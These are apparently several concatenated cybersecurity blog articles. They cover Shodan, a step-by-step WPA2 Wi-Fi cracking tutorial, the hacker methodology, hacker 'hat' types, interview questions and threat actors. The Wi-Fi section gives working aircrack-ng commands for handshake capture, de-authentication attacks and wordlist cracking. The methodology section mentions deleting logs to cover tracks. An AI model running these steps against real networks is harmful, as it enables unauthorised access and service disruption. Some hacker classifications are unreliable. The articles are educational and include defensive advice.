Security teams use Shodan to find exposed devices within their networks. It allows them to patch vulnerabilities before someone can exploit them.

Researchers can track vulnerabilities or malware by monitoring devices on Shodan.

Unfortunately, Shodan can also be a hacker’s dream. Hackers can use Shodan to locate devices exposed to the Internet. These include webcams, servers, and even industrial control systems.

A worrying fact about Shodan is its ability to find industrial control systems. An Industrial Control System (ICS) controls and monitors industrial processes. It’s the “brain” behind machines in factories, power plants, and water treatment plants.

Shodan has found thousands of unsecured, internet-connected industrial control systems (ICS). In some cases, these systems had no password or used default credentials.

Shodan has also indexed thousands of security cameras, database servers, and IoT devices. These raise serious privacy and security concerns. All these can be easily exploited if not properly secured.

To protect your own devices, you must understand Shodan. You need to know how it works and what it can find.

So, how can you prevent Shodan from exposing your devices?

1. Change Default Credentials: Always change the default usernames and passwords on your devices.

2. Use Strong Passwords: Avoid weak passwords. Use a mix of letters, numbers, and symbols, and consider using a password manager.

3. Disable Unnecessary Services: If your device has services you don’t use, disable them. This reduces the number of potential vulnerabilities.

Conclusion

Shodan is a powerful tool. It’s a reminder that any device connected to the internet is potentially exposed. It offers useful insights for cybersecurity experts but also an opportunity for cybercriminals.

Knowing what Shodan can do should make you take cybersecurity seriously. In a world where everything is connected, your security is only as strong as your weakest device. Stay informed, stay updated, and most importantly, stay safe.

Join the Stealth Security newsletter for more articles on offensive and defensive cybersecurity. To learn how to build a career in Cybersecurity, check out The Hacker's Handbook.

In my previous article, we talked about some basic Linux skills and tricks. In this article you are going to learn a basic Wi-Fi hacking procedure using those skills.

You'll learn things such as how to:

1. Monitor Wi-Fi networks around you
2. Perform a DOS attack
3. Protect yourself against Wi-Fi attacks

Disclaimer: This is strictly for educational purposes only (and, of course, for a little fun). Do not under any circumstances, conditions, or influence of unwise friends use the hacks you learn here on organisations, individuals, or your probably annoying neighbour. You would be committing a crime and you'll either be fined, sent to jail, or just get your parents embarrassed.

And now that we have that lovely introduction out of the way, let’s proceed.🙃

What We'll Cover:

Here's a basic rundown of what this tutorial contains:

1. Introduction
2. What is a Packet?
3. How to Crack WPA2
   • Prerequisites
   • How to put the network card into monitor mode
   • How to look for the target
   • How to capture the handshake packets
   • How to perform a DOS attack
   • How to obtain the password (hopefully)
4. Mitigations Against WiFi Attacks
5. Conclusion

Introduction

A router ¦ Credit: Unsplash.com

Wireless Fidelity (Wi-Fi) is a common technology many of us use in our daily lives. Wether it's at school, home, or simply bingeing Netflix, it’s increasingly rare to see anyone carry out Internet related activities without it.

But have you ever tried to hack Wi-Fi? 🤔 (I’m sure you’ve been tempted 😏).

In order to hack something, you need to know how it works. This means you need to understand how the tech works in the first place. So let’s start from the basics: The Packet.

What is a Packet?

A Basic Packet. Credit: ResearchGate.com

A Packet is the basic unit/building block of data in a computer network. When data is transferred from one computer to another, it is broken down and sent in packets.

Think of packets like Lego building blocks. You (the computer) receive the complete set (the complete data) in pieces (packets) from the seller (another computer). You will then assemble the blocks together to build up the figure based on the instructions given in order to enjoy it (or in this case, for the whole data to make sense).

A packet, also known as a datagram, is made up of two basic parts:

1. A Header
2. The Payload/Data

The Header contains information about the packet. This helps the network and the receiving computer know what to do with it, such as the source and destination IP addresses.

The Payload is the main content the packet contains. It’s also worth mentioning that packets can be encrypted so that their data can't be read if gotten by an attacker.

In a network, packets are a requirement for packet switching. Packet switching means breaking down data into packets and sending them to various computers using different routes. When received, the computers can then assemble these packets to make sense of it all. The Internet is the largest known packet switching network on earth.

Now let's see how we can apply this knowledge to wireless networks.

How to Crack WPA2

A bunch of random code. Credit: Unsplash.com

Wi-Fi can use a number of various protocols to give you a secure internet connection. From the least to most secure, they are:

1. Open
2. WEP (Wired Equivalent Privacy)
3. WPA2 (Wi-Fi Protected Access 2)
4. WPA3 (Wi-Fi Protected Access 3)

An open network is pretty much as the name implies – open. It has no password and practically anyone can connect to it.

WEP is an old protocol, rarely in use and requires a password like its successors.

WPA2 is the most commonly used protocol around the world. WPA3 is a newest and the most secure protocol known till date. But it is rarely used and only available on newer devices.

Prerequisites

Wi-Fi works by constantly sending packets of data to your authenticated device. In order to hack it, you’ll need:

1. A Linux machine (Preferably Kali Linux)
2. A wireless adapter

To install Kali from scratch, you can follow this tutorial.

If you haven’t already, you’ll need to install a tool called Aircrack-ng on your machine. To install it, just type in the command below.

sudo apt install aircrack-ng

How to Put the Network Card into Monitor Mode

You first want to get information about the target. This is what hackers call reconnaissance.

In order to do that you need to first change your wireless card from ‘managed’ mode to ‘monitor’ mode. This will turn it from a mere network card to a wireless network reader.

First you need to find out the name of your wireless card. Plug in your adapter and run the iwconfig command to find out. It’s usually the last one on the list.

iwconfig. Credit: Daniel Iwugo

As you can see, mine is wlan1. Now run the following commands:

sudo airmon-ng check rfkillsudo
airmon-ng start <network interface>

sudo indicates the need for root privileges, check rfkill stops processes that could hinder the card from going into monitor mode, and start tells airmon-ng which network card to execute on. Replace the <network interface> with the name of your wireless card.

airmon-ng is a script that instantly changes your card to monitor mode. You actually can do this manually or make a script of your own but I personally prefer something rather simple.

How to Look for the Target

To see what networks are around you, run the following command:

sudo airodump-ng <network interface>

Airodump. Credit: Daniel Iwugo

airodump-ng is a part of the aircrack-ng suite that allows a network card to view the wireless traffic around it.

As you can see we get a lot of information. But let's take a quick look at the ESSID (Extended Service Set Identifier) column. Also known as the AP (Access Point) name, this column shows the name of the target network, which in my case will be ‘Asteroid’.

You want to concentrate on the target AP and ignore the rest. To do this, press Ctrl+C to cancel the current scan and this time, append the bssid of the network with the bssid flag as shown below.

sudo airodump-ng <network interface> --bssid <AP>

Airodump in action. Credit: Daniel Iwugo

The BSSID stands for Basic Service Set Identifier, a fancy name for the MAC address of the device. You use it to identify the device on a network, along with the ESSID (Name of the AP). Technically, you could just use the ESSID flag instead but different APs could have the same name. However, no two APs can ever have the same BSSID.

Below is a code snippet of what you would type to get info about the AP using the ESSID only.

sudo airodump-ng <network interface> --bssid <AP ESSID>

Note: If the name has a space, enclose it with quotes. For example, --bssid “Asteroid 1” .

You’ll notice I highlighted the MAC address of a client connected to the AP under the ‘Station’ column. To its left is the MAC address of the AP it is connected to.

How to Capture the Handshake Packets

The next step is to capture the handshake packets (Remember packets? 👀). Handshake packets are the first four packets sent from the AP when an authenticated device connects to an AP.

This means we have two options:

1. Wait for a device to connect to the AP
2. De-authenticate the device and then let it connect to the AP

The second one sounds a lot more fun so let’s go for it.

An LED keyboard. Credit: Unsplash.com

How to Perform a DOS Attack

You can use aireplay-ng or mdk4 to disconnect devices from APs for a time. This is called a de-authentication attack or a wireless DOS (Denial-Of-Service) attack.

Now here’s the game plan:

1. Setup airodump-ng to capture packets and save them
2. De-authenticate the device for some time while airodump-ng is running
3. Capture the handshake

Got all that? Good. Let’s roll. 👨‍💻👩‍💻

First, run the command to capture and save packets:

sudo airodump-ng -c <channel number> --bssid <AP BSSID> <network interface> -w <path for saved packets file>

Airodump capturing packets. Credit: Daniel Iwugo

Here, we're using the -c flag to specify the channel to search, the --bssid flag for the MAC address of the AP, and the -w flag to give a path you want to save the captured packets to.

Quick lesson: Channels reduce the chances of APs interfering with each other. When running airodump-ng, you can identify the channel number under the CH column.

While that is running, you’re going to run your de-authentication attack against the device connected to it using the command:

sudo aireplay-ng -a <BSSID of the AP> --deauth <time> <network interface>

The -a flag specifies the MAC address of the AP, --deauth specifies how long you want the attack to run in seconds, followed up by the network card.

A de-authentication attack involves using your own network card to send packets to interrupt communication between the AP and the client. It’s not perfect and sometimes the client may connect back, but only for a short time.

If your Wi-Fi is acting crazy and you seem to be disconnecting and connecting randomly back to it, you may be experiencing a de-authentication attack.

In the command above, you’re targeting the AP and running the attack. Note that you can instead attack any device connected to the AP and you should get the same result. All you need to do is to change the -a flag to the MAC address of any device connected.

While the DOS attack is underway, check on your airodump scan. You should see at the right top : WPA handshake: <mac address>. Once you have verified that, you can stop the replay attack and the airodump-ng scan.

Carrying out the replay attack to get the handshake. Credit: Daniel Iwugo

How to Obtain the Password (Hopefully)

In the final steps, you are going to run a bunch of generated Pairwise Master Keys (PMKs) against the captured packets to get the password. Let me break it down.

A PMK is basically an algorithmic combination of a word and the APs name. Our intention is to continuously generate PMKs using a wordlist against the handshake. If the PMK is valid, the word used to generate it is the password. If the PMK is not valid, it skips to the next word on the list.

I’m going to use the rockyou wordlist located in the /usr/share/wordlists directory. I think this is only found in Kali so if you have a different OS, you might make one of your own manually or generate one using crunch.

If it isn’t already extracted, just run the command:

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

Quick history lesson: The rockyou wordlist is a bunch of passwords gotten from one of the most infamous cybersecurity data breaches that affected a company of the same name. It contains approximately 14 million unique passwords that were used in over 32 million accounts and as such, is one of the most dependable wordlists on the planet.

Now run the command:

sudo aircrack-ng <captured file with .cap> -w <path to wordlist>

Password cracking. Credit: Mercury

Alright, everyone – mission accomplished 😎.

The password was, well… ‘password’. Pretty disappointing from a security perspective, but I set this network up just for fun for the purposes of this tutorial. In reality, this could take minutes to hours depending on the length and strength of the password.

To clean up, simply remove the file captures, close your terminals, and run the command service NetworkManager restart to change your network card back to managed mode so you can connect to the Wi-Fi.

Mitigations Against WiFi Attacks

A basic personal workspace setup ¦ Credit: Wallpaperflare.com

Basic Wi-Fi security should cover this attack from a defensive perspective. Using WPA3 which is a newer protocol is your best bet against such an attack. To mitigate against de-authentication attacks, use an ethernet connection if possible.

Assuming that option is not on the table, you can use a strong passphrase (not a password) to minimise the attackers chances of getting it. A passphrase is a string of words simply used as a password. Passphrases tend to be longer than passwords, easier to remember, and are a rarer practice. Therefore, they will hardly be found in wordlists.

For example, ‘mercury’ is more likely to be found in a wordlist than ‘mercurylovespluto’. The later is a 15-character passphrase and as simple as it is, it would be hard for an attacker to find, guess, or generate.

Another mitigation would be to disable WPS (Wi-Fi Protected Setup) and avoid under any circumstance using a router that uses the WEP protocol. You’d just be asking for unwanted attention as it’s a lot easier to hack both of these than WPA2.

Conclusion

Let’s summarise what you’ve learned:

1. Change the wireless adaptor to monitor mode using airmon-ng
2. Scan for the target AP using airodump-ng and capture the packets
3. Perform a DOS attack on the AP to get the handshake packets
4. End the DOS once you have verified you captured the necessary packet
5. Use aircrack-ng to generate PMKs to run against the handshake packets

Sometimes, the password may not be in the wordlist. In that case, there are many other ways to get the password such as an Evil Twin Attack or variations of what you have learned here. I also encourage you to practice this and many other attacks you discover out there, as this helps make you a master hacker.

Remember, this is strictly for educational purposes. Only perform this on others with their consent, or on your own devices.

And with that, we have come to the end of this article. Hope you enjoyed it. And as I always say, Happy hacking! 🙃

Resources

1. A little more explanation on the handshake theory
2. More details on packets
3. WPA2 vs WPA3

Acknowledgements

Thanks to Anuoluwapo Victor, Chinaza Nwukwa, Holumidey Mercy, Favour Ojo, Georgina Awani, and my family for the inspiration, support and knowledge used to put this post together. You’re my unsung heroes.

Cover photo credit: Lego Gentlemen working on a router from Wallpaperflare.com

In this article, you will learn what the hacking process really looks like. And hopefully one day, you'll get to say those famous words: “I’m in”.

Disclaimer: This is for educational purposes only. Please (with a cherry on top), do not use this knowledge to perform illegal activities. I might be one of the white hats to put you in jail someday 🙃. Thank you.

How do Hackers Hack?

Tony Stark attempting to hack S.H.E.I.L.D | Credit: animatedtimes.com

Since you are reading this article, I’ll assume that you already know the basics of what hacking is, so let's jump right in.

There really is no general agreed upon process of hacking, in part because there are a few different types of hackers. But, I will tell you the steps the majority of hackers (and I myself) follow.

They are:

1. Reconnaissance
2. Enumeration
3. Exploitation
4. Privilege Escalation
5. Post Exploitation
6. Covering Tracks
7. Report Writing

We'll go through each one in detail so you get a good feel for the process.

If you want to dive deeper and learn more about what white hat (ethical) hackers do, check out this course.

Reconnaissance

A neon themed hollywood hacker | Credit: Wallpaperflare.com

Recon (aka footprinting) is the first, longest, and most important step. This entails getting as much information as you can about the target without interacting directly with the target.

Basic OSINT (Open Source Intelligence) skills are a hacker's best friend here.

Quick lesson: OSINT is the collection and analysis of information from public sources in order to gain actionable intelligence. National security agencies, investigative journalists, and hackers legally gather such information in order to create measures, stories, and dossiers, respectively, about targets.

You can find the OSINT framework guide here.

The greatest resource for recon is the Internet, and the greatest tool is the search engine, Google. To make this a lot easier, Google dorking would be a good place to start. Dorking in this sense means the use of advanced search techniques to find out more information about a target that you normally wouldn’t be able to find using normal methods.

Other resources for recon include:

1. Wikipedia (The biggest encyclopedia to this date)
2. Social Media such as Instagram, Twitter, and Facebook (Best resource for social engineers)
3. who.is (To get information about a website)
4. sublist3r (Lists subdomains publicly available)
5. Media such as newspapers, radio, and television

Enumeration

Magnifying glass over binary ID fingerprint | Credit: Wallpaperflare.com

This is like reconnaissance, except you gain information about the target by interacting with it for the purpose of looking for a vulnerability.

Do note, though, that things can get a lot riskier as the target could discover that you are trying to find out information about them, and could put countermeasures in place to hinder you.

Network enumeration involves port scanning and network mapping. This helps you learn about the target’s operating system, open ports, and services being run, along with their version. Nmap (network mapper), burp suite, and exploit-db/searchsploit are common tools you can use for network enumeration.

Tip: Knowing the version of services is a great way to find a vulnerability. Old versions of software may have a known vulnerability which could be on the exploit-db site. You could then use this to perform an exploit.

Physical enumeration involves gaining information through physical means. This could be done via dumpster diving (getting credentials and confidential information from the trash) and social engineering.

Social engineering is quite a broad topic and will get an article of its own later. However, in simple terms, it means hacking humans using manipulative social skills.

Exploitation

A fake terminal access | Credit: Wallpaperflare.com

Exploitation involves gaining access to the target successfully using a vulnerability discovered during enumeration.

A common technique for exploitation is to deliver a payload after taking advantage of the vulnerability. In simple terms, this is finding a hole in the target, and then running code or software that lets you manipulate the system, such as a bash shell.

Infamous vulnerabilities that are commonly exploited are EternalBlue (Windows) and the Apache log4j (web servers) vulnerabilities.

Common tools you can use for exploitation include:

1. Metasploit (The big gun 🔫)
2. Burpsuite (For web applications)
3. Sqlmap (For databases)
4. Msfvenom (Used to create custom payloads)

Quick lesson: A payload is software run after a vulnerability has been exploited. Once exploited, the target computer doesn’t have anything to give you access with. And so you need a payload to give you access and allow you to manipulate the target.

A very common payload many hackers use is meterpreter. It is a payload by metasploit that allows you to easily transverse the hacked computer.

Privilege Escalation

Random Text with “Administrator” | Credit: Wallpaperflare.com

In order to understand privilege escalation, you need to grasp two concepts:

1. User Accounts
2. Privileges

A User Account is a profile on a computer or network that contains information that's accessed via a username and password.

There are two kinds of user accounts: Administrator account and Standard account. Home computer users usually only have one user account, which is the administrator. In contrast, organisations have multiple accounts on a network or computer, with a system administrator having the administrator account and the basic employees having various standard accounts.

Privileges are the permissions that let you write, read and execute files and applications. A standard user doesn’t have privileges (permissions) to critical files and applications which we want. However, an administrative account will have privileges for everything.

Escalation is the movement from one user account to another. This could either be vertical or horizontal.

Vertical escalation is when a hacker moves from an account with fewer privileges (standard account) to an account with more privileges (administrative account).

Horizontal escalation is when a hacker moves from one user account to a similar account of the same privilege level in hopes of performing vertical escalation with the new compromised account (standard account to standard account).

The administrative user accounts you would want to target are root (Linux) or Administrator/System (Windows). These accounts have all the privileges and are practically a goldmine if you get access to them, as you can take absolute control of the computer.

Techniques to perform privilege escalation include:

1. Password spraying (Reusing passwords)
2. Cracking password hashes (Finding passwords of other users)
3. Finding ssh keys (Used for horizontal escalation)
4. Abusing SUID binaries (Taking advantage of misconfigured privileges in Linux)
5. Running tools scripts to look for escalation routes (enum4linux is nice and PEASS-ng has a great suite)

Post-Exploitation

Code with text “malicious virus” | Credit: Wallpaperflare.com

Usually, white hats skip over to the very last step. But I will include this and the next for the sake of knowledge.

Post exploitation is the use of tools with the aim of gaining persistence and obtaining sensitive information from the target computer.

This could be done in a number of ways including:

1. Installing a permanent backdoor, listener, or rootkit
2. Installing malware such as viruses and trojans
3. Downloading intellectual property, sensitive information, and Personal Identifiable Information (PII)

Covering Tracks

An Anonymous themed background | Credit: Wallpaperflare.com

This is as simple as it gets, but can be incriminating if there is even a slight mistake. A malicious hacker has to be careful to not leave behind files, scripts, or anything that can be used by a digital forensics expert to track the hacking back to them.

Some basic things to do would be to delete log files and the history file in Linux. The meterpreter payload even has a feature to delete all logs on the Windows Event Manager.

Reporting

Digital report writing | Credit: Wallpaperflare.com

This is the final step of the hacker methodology. It involves writing down a basic rundown of the entire process you went through above.

There are various formats, but a basic one will include:

1. Vulnerabilities found and their risk level
2. A brief description of how the vulnerabilities were discovered
3. Recommendations on how to remediate the vulnerabilities

Tip: Note taking when hacking is very important. I personally learned this the hard way when doing CTFs (Capture The Flag).

Not only does it make it easier when writing reports, but they also allow you to avoid repeating failed attempts and sort through information easily. They also let you look back on what you’ve done later on. Taking screenshots is also a great idea.

Conclusion

Alright so let's do a quick recap of the hacker methodology:

1. Reconnaissance
2. Enumeration
3. Exploitation
4. Privilege Escalation
5. Post-Exploitation
6. Covering Tracks
7. Report Writing

Resources to help you practice:

1. Test your knowledge on the hacker methodology
2. Tips on how to protect yourself from hackers
3. More information about OSINT

Acknowledgements

Thanks to Chinaza Nwukwa, Holumidey Mercy, Georgina Awani, and my family for the inspiration, support, and knowledge used put this post together. You guys are the best.

Well, in this article, you will learn how hackers are classified by comparing them to a Marvel or DC hero that more or less represents them and what they do.

What is a Hacker?

Hats on Silhoettes | Credit: Wallpaperflare.com

A hacker is an individual who uses their skills to breach cybersecurity defences. In the world of Cybersecurity, hackers are typically classified by a ‘hat’ system. This system likely came from old cowboy film culture where the good characters typically wore white hats and the bad ones wore black hats.

There are 3 major hats in the cyberspace:

1. White Hats
2. Grey Hats
3. Black Hats

However, there are some others that have also cropped up over time such as:

1. Green Hats
2. Blue Hats
3. Red Hats

Let’s dive in and learn what all these different types of hackers do, shall we? 🙃

White Hat Hackers

Captain America | Credit: Wallpaperaccess.com

White hats are just like Marvel’s Captain America 🛡️. No matter the day, time, or age, they always stand up for what’s right and protect civilians and organizations at large by finding and reporting vulnerabilities in systems before the black hats do.

They usually work for organizations and take roles such as a Cybersecurity Engineer, Penetration Tester, Security Analyst, CISO (Chief Information Security Officer), and other security positions.

Under these organizations they perform tasks such as:

1. Scanning networks
2. Configuring IDSs (Intrusion Detection Systems)
3. Ethically hacking computers to find vulnerabilities and report them so they can be addressed
4. Programming honeypots (Traps for the attackers 😼)
5. Monitoring network activity for suspicious activity

Famous examples of such hackers include:

1. Jeff Moss (DEF CON founder)
2. Richard Stallman (Founder of the GNU project)
3. Tim Burners-Lee (Creator of the World Wide Web)
4. Linus Torvalds (Creator of Linux)
5. Tsutomu Shimomura (The man that caught Kevin Mitnick)

And if you want to hear more from the founder of a cybersecurity company herself, check out this podcast featuring Rachel Tobac.

Grey Hat Hackers

Batman | Credit: Alphacoders.com

DCs’ Dark Knight and grey hat hackers have a lot in common 🦇. They both want to stand up for the right thing but use rather unconventional methods to do so.

Grey hat hackers are the balance between white hats and black hats. In contrast to white hats, they do not ask for permission to hack systems but do not perform any other illegal activities like black hat hackers.

Grey hats have quite a controversial history. This makes them hard to really classify, especially if their moral compass goes a little haywire down the line or what they did seems more black hat-ish than white hat-ish. Some even end up in jail for what they do.

But there are some that rise to be the heroes of the people and the enemy of the government and big organizations.

Some (in)famous examples of grey hat hackers are:

1. Anonymous (World famous hacktivist group)
2. HD Moore (Creator of Metasploit)
3. Adrian Lamo (aka the homeless hacker)
4. Khalil Shreateh (Hacked the facebook account of Mark Zuckerburg 🤣)

Black Hat Hackers

The Joker | Credit: Wallpapersden.com

Time to introduce the harmful lot 🃏. The Joker and Black Hats are like peas in a pod. They perform illegal activities for financial gain, the challenge, or simply for the fun of it.

They look for computers that are vulnerable over the internet, exploit them, and use them to whatever advantage they can.

Black Hats use techniques for getting into systems just like white hats. However, they don’t use their defensive skills – rather, they up their game on the attack by doing things such as:

1. Installing backdoors
2. Maintaining access to compromised systems
3. Performing privilege escalation
4. Downloading private/sensitive/intellectual data
5. Installing malware such as ransomware
6. Creating phishing emails and links

Examples of infamous black hats include:

1. Kevin Mitnick (Most wanted cybercriminal in U.S history)
2. Julian Assange aka Mendax (Creator of Wikileaks)
3. Hamza Bendelladj aka Bx1 (Latter owner of the ZeuS Banking Malware)
4. Kevin Poulsen (Dark Dante)
5. Robert Tappan Morris (Creator of the morris worm)

Mitnick, Poulsen, and Morris were criminally charged, served their sentences, and are good guys now. Mitnick founded a cybersecurity company. Poulsen created SecureDrop. And Morris became a professor at MIT (Don’t you just love a happy ending? 🤧).

Green Hat Hackers

Ms Marvel | Credit: Wallpapercave.com

Ms Marvel and Green hats are a match made in heaven 🌟. They are both young, enthusiastic, inexperienced and have the tendency to take risks and learn from their mistakes. Green hats are hackers that are new to the industry but are willing to learn to become great hackers.

Because of the availability and easy of use of hacking tools these days, it's pretty easy for a green hat to end up in trouble as they may not fully understand the full workings of the tool or target. But, they learn from their errors to gather experience.

Green hats may upgrade to White, Grey, or Black Hat hackers as they continue to move up the ranks.

Blue Hat Hackers

John Wick | Credit: Wallpaperswide.com

Okay, I know. John Wick isn’t a part of either DC or Marvel but Dynamite Comics’ greatest hitman is a favourite of any fan 🐶.

Mr Wick and Blue hat hackers share the same ideology: Revenge. You kill John Wicks dog, he’ll come after you. You bully or threaten a blue hat, they will also come after you, except it's your digital life on the gallows.

But due to what I can only guess to be cultural differences, a blue hat could also mean an external security professional brought in to test software for vulnerabilities prior to its release.

Red Hat Hackers

The Punisher | Credit: Wallpaperflare.com

I think the character says it all ☠. The Punisher is a ruthless anti-hero that stands up for what is right but is never ever (and I mean ever 😬) going to give criminals second chances.

Red hats are the same. They target cybercriminals and damage whatever they can to disable criminal activities, permanently.

Red hats are hackers no one wants to mess with, not even a black hat. Other hackers usually attack Microsoft Windows computers but these hackers, they hack Linux computers.

They have no regrets, don’t think twice, and make black hats pay rather severely for their crimes by taking justice into their hands. They do this by destroying all data and backups of their target, and usually render the system useless.

Conclusion

And on that terrifying note, we have come to the end of this article. I hope you enjoyed it. And as I always say, Happy hacking! 🙃

Acknowledgements

Thanks to Chinaza Nwukwa, Holumidey Mercy, Georgina Awani, and my family for the inspiration, support and knowledge used put this post together. You guys are amazing.

Helpful Resources

1. What is a honeypot?
2. Many more classifications of hats

This article will serve as a quick and dirty guide to some of the most commonly asked interview questions for entry-level security jobs.

What's the difference between an allowlist and a denylist?

With an Allowlist, everything is denied access, except items which are on the list.

For example, a company might compile a list of all authorized company applications, and block all applications not on this list from running.

This is a very effective way to prevent problematic software from running in your environment, as it blocks by default.

With a Denylist, only items on the list are denied access.

For example, a company might deny certain websites, or categories (like porn, gaming, and so on).

This is somewhat effective, however given how categories are sometimes incorrect, and malicious software changes extremely quickly, it is not as effective as allowlisting and is often more reactive.

What's the difference between a penetration test and a bug bounty? Which one is better?

A Pen Test (or Penetration Test) is where a company hires a tester or firm (with non-disclosure agreements, or NDAs) to simulate an attacker. They will operate within a pre-defined scope during a limited time period, write up a report on their findings, and include recommended remediation steps.

Pen testers aren’t designed to find every weakness in a system (though they will try to identify as many vulnerabilities as possible). These are generally used by mature organizations (because for the test to be effective, an organization needs to be able to remediate any identified vulnerabilities).

Bug Bounties, on the other hand, open up the process of searching a company’s system for vulnerabilities to everyone on the bug bounty platform.

This leverages crowds (and therefore might find more vulnerabilities), but the number of vulnerabilities found likely depends on the interest of the crowd (continuous coverage isn’t guaranteed). Also, it doesn’t guarantee the same level of reporting as does a pen test (you might not have enough hackers who have the specific skill set testing your tool/application/website requires).

Further, a bug bounty program shouldn’t be undertaken without a plan in place for remediation of vulnerabilities (the security posture of the company should be relatively mature).

Further Reading: What are Bug Bounties, how do they work, and who should use them?

What's the difference between threat, vulnerability, and risk? How do you decide what to focus on?

A threat is a negative event which leads to an unwanted result. This includes an employee who clicks on a phishing link, a developer who misconfigures a database instance, or an earthquake which destroys your data center.

A threat actor is the person, group, or entity which is responsible for the event.

A vulnerability is a weakness in a system (such as lack of physical access control to a data center, SQL injection, and so on) that a threat actor can exploit.

A risk is the chance of a negative event (how likely is the bad thing to happen) and the impact of that event (how bad is the bad thing). A risk is commonly calculated by multiplying the likelihood x the impact.

Threat modeling is a process for identifying threats to a particular target, understanding them, and prioritizing them. This process is designed to answer the questions, ‘what type of actor is likely to target me?’ ‘where am I most vulnerable?’ ‘what are my high value assets?’.

Further Reading: An intro to threat modeling.

What's the difference between red, blue, and purple teams?

Red Team: Red teams are offense (breaking into systems).

Blue Team: Blue teams are on defense (defending systems).

Purple Team: Ideally a team which integrates the red and blue team in a way which facilitates them learning from each other and improves the security of the overall organization.

What's the difference between an event, an alert, and an incident?

An event is an aberration from normal system behavior.

An alert is a notification set to be sent when a specific event or series of events occurs.

An incident is an event with a negative impact on the organization (examples: a user downloads malware onto the network and it spreads, credential are pasted online by an attacker, and so on). Not every event becomes an incident.

Whats the difference between encoding, encryption, and hashing?

Encoding is a way of converting data from one format to another (for example from text to ASCII). It's not inherently a security function.

Encryption is a way of hiding a message with the intent of only allowing the intended recipient to understand the meaning of the message.

It is a two way function (you need to be able to undo whatever scrambling you’ve done to the message). This is designed to protect data in transit.

Hashing is a one-way function (it can't be reversed) which converts a variable length message to a fixed length string which is unique for each message.

Hashes are used as a space-efficient way to store data, and a secure way to store passwords. If a password is stored as a hash, even if the computer is compromised the data is still safe (because the function can't be reversed). When the user enters a password, the computer can just use the same hashing function to convert the password into a hash, which it can compare to the stored hash to see if they match.

Hashing functions are also used to create message digests in order to verify that a message hasn't been changed in transit.

Further Reading: Learn more about what hashing is here, and how encryption works here.

Should you encrypt or compress data first?

Compress, then encrypt. If you encrypt first, you’ll only have random data to work with, which removes the benefits of compression.

What is salting?

Salting is the process of adding random values to the end of data, like a password, and then hashing the value.

This protects against brute force attacks (when an attacker tries every possible combination of letters and numbers until the password is found) as it makes it harder for an attacker to guess.

Further Reading: Learn more about salting here.

Is TLS, SSL, or HTTPS more secure?

TLS (Transport Layer Security) is a cryptographic protocol which helps secure communications over a network.

SSL (Secure Sockets Layer) is the predecessor to TLS, and is largely depreciated.

HTTPS (Hypertext Transfer Protocol Secure) is just HTTP encrypted with SSL or TLS (typically TLS, since it has largely replaced SSL). Since you can't have HTTPS without SSL or TLS, this is a trick question.

What port does ping work over?

Again, a trick question, as ping is a layer 3 protocol which uses ICMP and doesn't work over a port at all.

What protocol does DNS use?

UDP is used for name and regular or reverse queries, as well as any information smaller than 512 bytes.

TCP is used for zone transfer and information larger than 512 bytes. Also, if a client doesn't get a response, it will retransmit the data using TCP.

Looking for more interview prep resources?

• 60 Cybersecurity Interview Questions
• Lesley Carhart's Infosec Career Advice
• Troy Hunt's Career Advice
• Local BSides Events
• WiCyS Career Resources

If you want to protect systems, you need to understand whom you’re defending them from.

Many of the attackers you’ll face will fall into several different groups. These different groups often use very different tactics, techniques, and procedures (TTPs) for attacking systems.

Identifying which actors or groups of actors may target your systems can help prioritize the mitigations which are most important.

Script Kiddies:

Script kiddies are technically inexperienced hackers. Often they’re young – even teenagers. They don’t know how to write their own code or exploits, but can use tools others have developed. They're often motivated by fun.

They commonly use phishing attacks, tools they’ve bought from others on dark web marketplaces, or free tools. They’ve been associated with hacks on video game companies, like this one.

Cyber Criminals:

Cyber criminals range in technical sophistication from script kiddies to organized gangs, where each member fulfills a different role in the cyber crime ring. They are responsible for the majority of data breaches and are primarily motivated by money. They’re known for ATM fraud (‘jackpotting’), credit card and gift card theft, ransomware, and data theft (among other attacks).

The most common attack from cyber criminals is mass phishing campaigns, as these can be used to distribute ransomware or enable data theft. When an unwary user clicks the link or opens the attachment, ransomware (malicious software which will lock their files until they pay a ransom (usually in digital currency)) will infect their machine.

Alternatively, the phishing link might ask for a user’s credentials (username and password) and then use that information to steal information or blackmail the user.

Large scale phishing campaigns like this are very technically easy to execute, and are extremely profitable.

Protecting against cyber criminals is generally a matter of being more secure than your 'neighbors' as cyber criminals are looking for the easiest target.

Automated spam filtering, scanning of email attachments and links, and measures such as DMARC, SPF, and DKIM can help reduce the number of phishing emails delivered to your users. Security awareness programs can also help users identify phishing emails missed by the filters and report them to your security team.

In the last few years, this has changed somewhat, as big game hunting has become more popular.

Essentially this is when cybercriminals choose a large entity (often one which has a low tolerance for downtime) to target and spend weeks or months working to break into the target's network, specifically looking for high value assets.

They will then deploy ransomware and use the company's inability to deal with downtime to negotiate for a ransom (in addition to exfiltrating data and leveraging the threat of that data being leaked to induce a company to pay the ransom).

The criminals tend to be relatively sophisticated, prioritizing stealth. Protecting against these groups is much more difficult and depends upon a layered defense (myriad protection and alerting mechanisms in order to protect systems, detect intrusions, and mitigate vulnerabilities).

Hacktivists:

Hacktivists are motivated by issues (political, economic, religious, and so on). Some of these actors are solo actors, and some are in groups such as Anonymous (known for a series of attacks on the Church of Scientology).

These groups often use DDoS (distributed denial of service) attacks and website defacements. A DDoS attack is when an attacker overwhelms a server with so many requests that it is unable to handle the traffic and crashes (often using a botnet). Website defacements occur when a group takes down the message or images currently displayed on a website and replaces them with their own.

Hacktivists are not generally motivated by money or data theft (unless they think if the data is exposed it will incriminate or embarrass the target), but instead want to spread their message or publicize their cause.

Protecting against these attacks is a matter of scanning public facing websites for vulnerabilities, having an incident response team (and an incident response plan!), and having protections in place to mitigate traffic spikes (for example Amazon Shield for AWS).

Insider Threat:

Insider threat can be broadly split into two groups: malicious insiders, and accidental insiders.

• Malicious insiders are those who have been compromised by an outsider, or who have decided to steal from the organization for personal gain. People who are angry about being fired or missed over for a promotion and want revenge, or who are trying to steal information for insider trading are malicious insiders.
• Accidental insiders include those who have clicked a phishing link (and had their account compromised), misconfigured a database, or accidentally sent sensitive information to the wrong person.

Regardless of an insider’s motivations, they pose one of the most dangerous threats to any organization. The primary concern for insider threats should be data theft, as information is usually the target of those type of attacks.

Defending against insider threat should be largely driven by security awareness. People want to be helpful, which is a trait hackers will exploit through social engineering attacks to gain information.

Security programs usually use security training, Security Champions programs, and awareness initiatives to educate their employees about this threat. In addition, comprehensive monitoring of internal networks for unusual behavior (often using user behavior analytics) can help you identify and mitigate insider threats.

